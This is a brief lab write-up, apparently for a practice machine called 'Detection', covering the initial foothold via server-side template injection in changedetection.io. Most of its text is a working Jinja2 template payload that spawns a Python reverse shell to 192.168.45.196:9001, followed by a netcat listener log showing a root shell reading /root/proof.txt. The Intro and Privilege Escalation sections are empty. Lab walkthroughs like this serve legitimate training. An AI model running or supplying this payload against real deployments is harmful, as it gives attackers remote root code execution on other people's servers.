# Detection

## Intro

## Initial Foothold

<figure><img src="https://2198412308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTlGdjVUx1Zp0BuO3GLEj%2Fuploads%2FWOmj0X0puQ4BYPpi2aJX%2Fimage.png?alt=media&#x26;token=09fd10c2-51cc-405d-a4c6-82b1044a26c7" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2198412308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTlGdjVUx1Zp0BuO3GLEj%2Fuploads%2FJdM4G5fmOwQPx5kcykcC%2Fimage.png?alt=media&#x26;token=09525cda-5b66-4806-8b64-451032ddb16e" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2198412308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTlGdjVUx1Zp0BuO3GLEj%2Fuploads%2FIJkrupV6iElAMCfoMDKx%2Fimage.png?alt=media&#x26;token=0f1d6f93-b071-409c-8e17-f05edc786e6b" alt=""><figcaption></figcaption></figure>

```
{{ self.__init__.__globals__.__builtins__.__import__('os').popen("python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\"192.168.45.196\",9001));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"/bin/bash\")'").read() }}
```

{% embed url="<https://blog.hacktivesecurity.com/index.php/2024/05/08/cve-2024-32651-server-side-template-injection-changedetection-io/>" %}

```
┌──(venv)─(root㉿kali)-[/home/joe/hax/pg/detection]
└─# nc -lvnp 9001
listening on [any] 9001 ...
connect to [192.168.45.196] from (UNKNOWN) [192.168.199.97] 52556
root@detection:/# cat /root/proof.txt
cat /root/proof.txt
4b23104610703656c41480e23a67c656
```

## Privilege Escalation